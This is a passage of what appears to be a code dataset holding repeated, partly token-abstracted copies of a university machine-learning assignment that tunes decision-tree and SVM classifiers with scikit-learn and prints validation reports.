y_training)\n return nbc, results\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. 
a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. 
This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. \n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. 
\n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\ndef print_introduction(team_array):\n \"\"\"\n Print a nice introduction to the code being run, including well-formatted\n team member list.\n \n @param:\n team_array: array of student numbers and names returned form my_team()\n \n @return:\n None. Print to console. \n \"\"\"\n print('\\n\\n***************************************************************'\n )\n print(' CAB320 ASSIGNMENT 2: MACHINE LEARNING ')\n print('***************************************************************')\n print('\\nTEAM MEMBERS:')\n for person in team_array:\n print('{:4} {:4} {:10} {:10}'.format(person[0], ':', person[1],\n person[2]))\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\ndef print_grid_search_report(grid):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n grid: a GridSearchCV object scored by accuracy, roc_auc, precision and \n recall, that has been fitted and therefore is available for \n access through cv_results_\n \n @return:\n None. Print to console. 
\n \"\"\"\n r = grid.cv_results_\n i = grid.best_index_\n score_grid = clf.scoring\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print(\n \"Based on validation {} scores, the best value for hyperparameter '{}' is:\\n{}\"\n .format(grid.refit, list(grid.best_params_.keys())[0], list(grid.\n best_params_.values())[0]))\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', r[\n 'mean_train_%s' % metric][i], r['mean_test_%s' % metric][i]))\n print('\\nMean fit time: {:.6f} seconds'.format(r['mean_fit_time'][i]))\n print('Mean score time: {:.6f} seconds'.format(r['mean_score_time'][i]))\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. \n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n\n\ndef print_clf_intro(name, params=None):\n \"\"\"\n Print a nice introduction to the classifier being tested and used.\n \n @param:\n name: string holding the name of the classifier type\n params: dict holding the name of the hyperparameter to be optimized\n \n @return:\n None. Print to console. 
